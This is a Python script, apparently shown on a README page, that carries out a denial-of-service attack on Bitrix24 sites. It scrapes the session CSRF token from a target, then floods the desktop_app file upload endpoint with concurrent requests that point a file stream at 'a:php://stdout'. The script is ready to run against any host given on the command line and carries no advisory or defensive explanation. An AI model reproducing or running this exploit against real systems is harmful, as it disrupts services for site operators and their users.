README.md
Rendering markdown...
#!/usr/bin/env python3
import random
import asyncio
import aiohttp
import re
import argparse
async def preauth(session, host):
try:
async with session.get(host, ssl=False) as response:
data = await response.text()
return re.search(r"'bitrix_sessid':'([a-f0-9]{32})'", data).group(1)
except aiohttp.ClientError as e:
print(f"Failed to access the website: {e}")
return None
async def DoS(session, sessid, host, site_id, num_requests):
tasks = []
for _ in range(num_requests):
CID = random.randint(0, pow(10, 5))
url = f"{host}/desktop_app/file.ajax.php?action=uploadfile"
data = {
"bxu_info[mode]": "upload",
"bxu_info[CID]": str(CID),
"bxu_info[filesCount]": "1",
"bxu_info[packageIndex]": f"pIndex{CID}",
"bxu_info[NAME]": f"file{CID}",
"bxu_files[0][name]": f"file{CID}",
"bxu_files[0][files][default][tmp_url]": "a:php://stdout",
"bxu_files[0][files][default][tmp_name]": f"file{CID}",
}
headers = {
"X-Bitrix-Csrf-Token": sessid,
"X-Bitrix-Site-Id": site_id,
}
task = asyncio.create_task(send_request(session, url, data, headers))
tasks.append(task)
await asyncio.gather(*tasks)
async def send_request(session, url, data, headers):
async with session.post(url, data=data, headers=headers, ssl=False) as response:
pass
async def main(host, site_id, num_requests):
async with aiohttp.ClientSession() as session:
sessid = await preauth(session, host)
if sessid is not None:
await DoS(session, sessid, host, site_id, num_requests)
else:
print("Aborting due to website access failure.")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Bitrix24 Improper File Stream Access DoS")
parser.add_argument("--host", required=True, help="Target host URL")
parser.add_argument("--site_id", required=True, help="SITE_ID value")
parser.add_argument("--num_requests", type=int, default=1000, help="Number of requests to send")
args = parser.parse_args()
asyncio.run(main(args.host, args.site_id, args.num_requests))